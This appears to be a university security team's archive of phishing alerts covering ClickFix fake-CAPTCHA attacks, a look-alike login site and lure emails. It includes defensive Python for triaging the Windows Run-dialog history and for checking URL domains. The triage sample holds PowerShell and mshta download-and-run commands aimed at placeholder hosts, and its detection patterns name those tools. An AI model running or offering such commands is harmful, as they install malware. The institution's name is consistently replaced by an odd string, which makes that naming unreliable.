Phish Alert Archives - Information Security

Canvas by Instructure: Important Notice
/uit/infosec/2026/05/08/canvas-by-instructure-important-notice/
Fri, 08 May 2026 23:20:03 +0000

Instructure, the company that operates Canvas (the learning management system used at Schulich to manage coursework, assignments, grades, and course communications), has reported a cybersecurity incident that appears to have affected Canvas at thousands of educational institutions worldwide.

Canvas remains available and University teaching and learning activities can continue as usual. We will share any changes if Instructure’s guidance or system status changes.

No action is required at this time, other than remaining alert for phishing or other suspicious messages.

Instructure has posted the following .

91亚色/Schulich is prioritizing assessing this incident and will update this message and share relevant updates and guidance through our usual communications channels as information becomes available.

Canvas is an externally-hosted platform. 91亚色 and Schulich School of Business systems were not affected.

The University is monitoring the incident response and will provide additional information and guidance as more details become available.

91亚色 is committed to protecting privacy and maintaining the trust of our students and community. We are working with Instructure to understand how this happened and what actions Instructure are taking to prevent future incidents.

We encourage all students, faculty, and staff to remain vigilant:

Questions: For questions about this notice or Canvas use at Schulich, please contact canvasincident@schulich.yorku.ca

Beware of Phishing: Cybercriminals often use stolen contact information to send convincing “phishing” emails. Be wary of any message, even those appearing to come from Schulich, 91亚色, or Canvas, that asks you to click a link, provide a password, or share personal details. A reminder: 91亚色 will never ask for your password by email, text, or phone.

Verify Communications: If you receive a suspicious message regarding this incident, do not click any links. Report it directly to infosec@yorku.ca.

Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks
/uit/infosec/2026/04/22/fake-captcha-real-threat-clickfix-social-engineering-attacks/
Wed, 22 Apr 2026 19:36:36 +0000

ClickFix attacks are a rapidly evolving threat that uses fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That’s why ClickFix pushes you to take extra steps yourself. By convincing you to run a command, the attacker gets past the protections already in place and installs malware that would otherwise be detected.

What is ClickFix?

ClickFix is a social engineering technique where attackers compromise legitimate websites, replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands often involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to “fix” a problem or “verify” the user. In reality, the script is being used to download malware that compromises your device.

This technique has been observed across higher-education institutions and is increasingly used to deploy malware families such as CORNFLAKE.V3, a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How does it Work?

ClickFix attacks follow a simple pattern:

  1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop-up appears unexpectedly.
  2. Instead of asking you to click images or check a box, it tells you there’s a “problem” and you need to run a command to continue.
  3. The page instructs you to open Windows + R, PowerShell, or Terminal and paste in a line of text.
  4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.

How Can I Spot a ClickFix Attempt?

Exercise caution towards any unfamiliar website, email, or popup that:

  • Asks you to open Windows Run (Windows + R)
  • Tells you to paste a command into PowerShell or Terminal
  • Claims you must run a script to “fix,” “verify,” or “continue”
  • Appears immediately after clicking a search result or ad
  • Displays a CAPTCHA that looks unusual, low-quality, or out of place

If you encounter instructions like:

“Press Windows + R and paste the following command…”

…it is almost certainly malicious.

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).
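For responders triaging a reported device, the Run-dialog step described above leaves a trace: Windows keeps Win+R history per user under the RunMRU registry key. The following is an added example, not part of the original alert; the indicator patterns and the sample history are constructed for illustration, and the hostnames use the reserved `.invalid` suffix.

```python
import re

# Per-user registry key where Windows stores Run-dialog (Win+R) history.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristic indicators chosen for this example (not a vendor rule set).
INDICATORS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|cmd(\.exe)?\s+/c|curl|msiexec)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "download_and_run": re.compile(
        r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|"
        r"invoke-restmethod|downloadstring)\b", re.I),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+hidden\b", re.I),
    "encoded_command": re.compile(
        r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "verification_lure": re.compile(r"captcha|not a robot|verif|human", re.I),
}

def normalize(data):
    """RunMRU string values end with a literal backslash-1 marker; strip it."""
    return data[:-2] if data.endswith("\\1") else data

def triage(runmru):
    """Classify Run-dialog entries, most recent first (MRUList order)."""
    findings = []
    for name in runmru.get("MRUList", ""):
        if name not in runmru:
            continue
        command = normalize(runmru[name])
        hits = [label for label, rx in INDICATORS.items() if rx.search(command)]
        fetches = {"remote_url", "download_and_run", "encoded_command"} & set(hits)
        if "script_host" in hits and fetches:
            # A script host that pulls remote or encoded content is already
            # unusual for Win+R; a fake "verification" comment is the
            # ClickFix lure the alert describes.
            verdict = "likely-clickfix" if "verification_lure" in hits else "suspicious"
        else:
            verdict = "ok"
        findings.append(
            {"value": name, "command": command, "verdict": verdict, "hits": hits})
    return findings

# Constructed sample of an exported RunMRU key (not from a real incident).
SAMPLE_RUNMRU = {
    "MRUList": "edcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\scans\\1",
    "c": "powershell\\1",
    "d": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/v)" '
         "# I am not a robot - reCAPTCHA Verification ID: 7731\\1",
    "e": "mshta https://files.example.invalid/setup.hta\\1",
}

if __name__ == "__main__":
    print("Key:", RUNMRU_KEY)
    for f in triage(SAMPLE_RUNMRU):
        print(f"{f['value']}: {f['verdict']:<16} {f['hits']} {f['command'][:60]}")
```

An "ok" verdict only means the Run dialog history shows nothing; commands pasted directly into an already open PowerShell or Terminal window are not recorded there.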

References:

  • https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  • https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/

Phish Alert - Malicious Website Impersonating 91亚色
/uit/infosec/2026/03/17/phish-alert-malicious-website-impersonating-york-university/
Tue, 17 Mar 2026 14:19:21 +0000

The Information Security team has identified a fraudulent website impersonating 91亚色 that is actively attempting to harvest community members' login credentials. This malicious site closely mimics the appearance of official 91亚色 web properties and may be encountered when users attempt to access University services through search engines.

The impersonation site is NOT affiliated with 91亚色 and should be considered malicious. Do NOT enter your username, credentials, Duo 2FA codes, or any other personal information on this site as this may result in unauthorized access to your accounts.

The fraudulent site uses the URL <www.yorkuonline.com>; an image is shown below for reference:

Red Flags to Watch Out For

Unsolicited messages directing you to log in:
Messages claiming your account will be disabled, your mailbox is full, or your access is expiring are common tactics used to lure users to fake login pages.

Suspicious URL:
Official 91亚色 login pages always use domains ending in yorku.ca. Any variation, such as extra characters, misspellings, or unfamiliar subdomains, should be treated as suspicious.

Unexpected login prompts:
If you are asked to “verify your account”, “update your credentials” or “restore access” after clicking a link you did not expect, this is a strong indicator of a phishing attempt.

Requests for Duo/MFA passcodes:
91亚色 will never ask you to enter Duo 2FA codes outside of the official login process. Any site requesting your passcode directly should be considered malicious.
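The "domains ending in yorku.ca" rule is easy to get wrong when it is automated, for example in a mail filter or link checker. The sketch below is an added example, not from the original alert: it compares a naive substring test with a check on the parsed hostname. Every URL other than the fraudulent one named above is constructed, and a suffix match does not vet individual subdomains.

```python
from urllib.parse import urlsplit

OFFICIAL_SUFFIX = "yorku.ca"  # per the alert: official login pages end in yorku.ca

def hostname_of(url):
    """Return the lowercase host a browser would actually connect to."""
    if "://" not in url:
        url = "//" + url              # let urlsplit treat bare hosts as a netloc
    host = urlsplit(url).hostname or ""   # drops userinfo ("user@") and port
    return host.rstrip(".")           # tolerate a trailing root dot

def naive_check(url):
    """What not to do: 'yorku.ca' appearing anywhere in the URL."""
    return OFFICIAL_SUFFIX in url.lower()

def classify(url):
    host = hostname_of(url)
    if not host:
        return "unparseable"
    labels = host.split(".")
    # Non-ASCII or punycode labels can render as look-alike characters.
    if not host.isascii() or any(l.startswith("xn--") for l in labels):
        return "lookalike-idn"
    # Exact match, or a label boundary immediately before the suffix.
    if host == OFFICIAL_SUFFIX or host.endswith("." + OFFICIAL_SUFFIX):
        return "official"
    return "not-official"

# Constructed test URLs, except www.yorkuonline.com which is named in the alert.
SAMPLES = [
    "www.yorkuonline.com",
    "https://sample.yorku.ca/login",
    "https://SAMPLE.YORKU.CA./login",
    "https://yorku.ca.example.invalid/login",    # suffix used as a prefix
    "https://yorku.ca@login.example.invalid/",   # suffix placed in userinfo
    "https://notyorku.ca/",                      # no label boundary
    "https://login.example.invalid/?next=yorku.ca",
    "https://xn--yorku-constructed.ca/",         # punycode label (constructed)
]

def report():
    return {u: (naive_check(u), classify(u)) for u in SAMPLES}

if __name__ == "__main__":
    for url, (naive, verdict) in report().items():
        print(f"naive={naive!s:<5} {verdict:<14} {url}")
```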

If you encounter any emails or messages directing you to this site, please report it using the Report Phishing button or forward the message to phishing@yorku.ca.

If you have already entered your credentials into the malicious site, change your password immediately by visiting . If you have any questions or concerns, please contact infosec@yorku.ca.

Phish Alert - Winter 2026 Term Commencement – Important Information
/uit/infosec/2026/01/05/phish-alert-winter-2026-term-commencement-important-information/
Mon, 05 Jan 2026 16:02:29 +0000

The Information Security team has identified a targeted phishing email sent on January 5, 2026 (today) that is being circulated among the 91亚色 community. The email used a subject line equal or similar to "Winter 2026 Term Commencement – Important Information" and falsely advertises monetary compensation in the form of a "Student Engagement Bonus" to recipients. Recipients are directed to submit their sensitive personal and financial information to an external address that is NOT affiliated with 91亚色 and is to be considered malicious.

Key details of the phishing email:

Subject: "Winter 2026 Term Commencement – Important Information"
Date: January 5, 2026
Sender: admin@gpaindustria.onmicrosoft.com

Red Flags to Watch Out For:

Suspicious sender email: The sender's email address is not associated with 91亚色’s official IT services (email was NOT sent from an @yorku.ca address).
Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond to this email or provide any personal information.
Do not click any links or open attachments that may be included.
Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

Phish Alert - Notification of Eligibility: Fall 2025 Bonus at 91亚色
/uit/infosec/2025/12/03/phish-alert-notification-of-eligibility-fall-2025-bonus-at-york-university/
Wed, 03 Dec 2025 18:50:44 +0000

The Information Security team has identified a targeted phishing email sent between December 2nd - 3rd, 2025 that is being circulated among the 91亚色 community. The email used a subject line equal or similar to "Notification of Eligibility: Fall 2025 Bonus at 91亚色" and falsely advertises a "Fall Bonus" to recipients. Recipients are directed to submit their sensitive personal and financial information to an external address that is NOT affiliated with 91亚色 and is to be considered malicious.

Key details of the phishing email:

Subject: "Notification of Eligibility: Fall 2025 Bonus at 91亚色"
Date: December 2 - 3, 2025
Sender: admin@gpaindustria.onmicrosoft.com

Red Flags to Watch Out For:

Suspicious sender email: The sender's email address is not associated with 91亚色’s official IT services (email was NOT sent from an @yorku.ca address).
Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond to this email or provide any personal information.
Do not click any links or open attachments that may be included.
Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

Phish Alert - Important: Your Eligibility for the Fall 2025 Bonus Payment / Notification of Eligibility: Fall 2025 Bonus at 91亚色
/uit/infosec/2025/11/17/phish-alert-important-your-eligibility-for-the-fall-2025-bonus-payment-notification-of-eligibility-fall-2025-bonus-at-york-university/
Mon, 17 Nov 2025 17:30:15 +0000

The Information Security team has identified a targeted phishing email sent on November 17th, 2025 that is being circulated among the 91亚色 community. The email used a subject line equal or similar to "Important: Your Eligibility for the Fall 2025 Bonus Payment" OR "Notification of Eligibility: Fall 2025 Bonus at 91亚色", and claims to be sent from 91亚色 Office of the Registrar.

The phish prompts recipients to submit personal information to an external address that is NOT affiliated with 91亚色.

Key details of the phishing email:

Subject: "Important: Your Eligibility for the Fall 2025 Bonus Payment" OR "Notification of Eligibility: Fall 2025 Bonus at 91亚色"
Sent: November 17th, 2025
Sender: admin@gpaindustria.onmicrosoft.com

The email falsely advertises a "Fall Bonus" to recipients and directs them to submit their personal information to an external address (registrar.yorku2025@aol.com). This external address is NOT affiliated with 91亚色's Registrar Office and is to be considered malicious.

Red Flags to Watch Out For:
Suspicious sender email: The sender's email address is not associated with 91亚色’s official IT services (email was NOT sent from an @yorku.ca address).
Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a fake Fall Bonus in exchange for submitting personal information.
Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:
Do not respond to this email or provide any personal information.
Do not click any links or open attachments that may be included.
Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

Phish Alert - 16.89 % Salary Increase Letter Wednesday, November 5, 2025
/uit/infosec/2025/11/05/phish-alert-16-89-salary-increase-letter-wednesday-november-5-2025/
Wed, 05 Nov 2025 15:30:39 +0000

The Information Security team has identified a targeted phishing email being circulated among the 91亚色 community. The email, titled "16.89 % Salary Increase Letter Wednesday, November 5, 2025", claims to be sent from 91亚色 Payroll & Employee Relations, and prompts recipients to submit personal information. The email was sent from a compromised external account that is not affiliated with 91亚色.

Key details of the phishing email:

  • Subject: 16.89 % Salary Increase Letter Wednesday, November 5, 2025
  • Sent: November 5th, 2025
  • Sender: harry.ruda@utoronto.ca

The email falsely claims to provide salary increase information enclosed in an attached PDF file titled "91亚色 (1).pdf", which later directs users to submit their credentials and personal information into a malicious webpage.

Red Flags to Watch Out For:

  1. Suspicious sender email: The sender's email address is not associated with 91亚色’s official IT services (email was NOT sent from an @yorku.ca address).
  2. Urgency and financial motivation: The email pressures you to act quickly, using the false promise of disclosing details pertaining to a salary increase.
  3. Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:

  • Do not respond to this email or provide any personal information.
  • Do not click any links or open attachments that may be included.
  • Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

Phish Alert - Beware of Sophisticated Phishing Campaign Targeting 1Password Users
/uit/infosec/2025/10/17/phish-alert-beware-of-sophisticated-phishing-campaign-targeting-1password-users/
Fri, 17 Oct 2025 14:51:20 +0000

The Information Security team is aware of a new phishing campaign targeting 1Password users with convincing "fake breach" alerts. Users of both personal and enterprise 1Password accounts should exercise caution and steer clear of emails that falsely claim to be from 1Password.

Cybercriminals are distributing emails with the subject line "🔒Watchtower Alert: Password Issue Detected" that appear to be legitimate breach notifications from 1Password. These messages claim that your account has been compromised and prompt you to click a link to “secure” your vault. The link leads to a fake login page designed to steal your credentials.

If you receive the phishing email described above or any other similarly suspicious emails claiming to be from 1Password, please do NOT click on any links within the email and submit your credentials or respond to the scammer. You can report this activity to our team using the Report Phishing button or by forwarding it to phishing@yorku.ca.

Red Flags to watch out for:

  • Sender impersonation: The email may appear to come from “watchtower@eightninety.com” or similar addresses.
  • Urgent language: Subject lines like “Watchtower Alert: Password Issue Detected” are used to provoke panic.
  • Fake login page: Clicking the link directs users to a site mimicking 1Password’s interface, but hosted on a malicious domain.
  • Subtle visual cues: The phishing page uses accurate branding and design elements, making it difficult to distinguish from the real site.

🔗 Additional Resources

Phish Alert - 91亚色u Account Verification Needed
/uit/infosec/2025/10/03/phish-alert-yorku-account-verification-needed-2/
Fri, 03 Oct 2025 13:24:33 +0000

The Information Security team wants to bring to your immediate attention a phishing email that has been circulating, which appears to originate from a UoT email address. This email is designed to trick recipients into sharing sensitive personal information, including passwords and account details. Please read the information below carefully to protect yourself and our community.

The email described above is NOT legitimate and was NOT sent by 91亚色. If you clicked on the link and sent an email to utgsu.duo@aol.com, please change your password immediately. If you have re-used the compromised password on any other accounts, please change the passwords for those accounts to something complex and unique to each account. Passport 91亚色 passwords can be changed at , logging in, clicking on “Passport YORK” on the left-hand menu and clicking the “Change My Password” button on the right.

Red Flags to Watch Out For:

  1. Suspicious sender email: The sender's email address is randomly generated and not associated with 91亚色’s official IT services.
  2. Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.

What to Do:

  • Do not respond to this email or provide any personal information.
  • Do not click any links or open attachments that may be included.
  • Report the email: If you received this phishing attempt, please report it using the Report Phishing button or forward it to phishing@yorku.ca

Phish Alert - "Financial Verification Notice" Scam Email
/uit/infosec/2025/09/22/phish-alert-financial-verification-notice-scam-email/
Mon, 22 Sep 2025 20:25:40 +0000

The Information Security team is aware of a phishing scam targeting International Students that is being circulated among the 91亚色 community on September 22, 2025. The scam instructs students to provide sensitive information pertaining to their financial institution, passport, and tuition payment information. The scam uses the 91亚色 logo and is attempting to impersonate 91亚色 Vice-Provost Students to instill a false sense of legitimacy. This letter is NOT legitimate and was NOT sent by 91亚色.

The scam letter is shown below for reference:

If you receive the scam letter via email or any other communication medium, please do NOT respond to the scammer and report it using the Report Phishing button or forward it to phishing@yorku.ca.

Red Flags to Watch Out For:

  1. Suspicious sender email: The sender's email address [i.e. example@mail.google.ca] is not associated with 91亚色’s official IT services.
  2. Urgency and fear tactics: The email pressures you to act immediately by threatening account deactivation.
  3. Request for personal details: 91亚色 would NEVER ask for passwords, Duo/MFA passcodes, or other sensitive information via email.
  4. Unsecure email address for responses: The email may ask you to respond to a suspicious external email address (i.e. utgsu.duo@aol.com), which is not a legitimate 91亚色 domain.

If you have already responded to this scam, stop all communication with the scammer and notify infosec@yorku.ca. If you provided any account names or passwords, change any such passwords immediately.
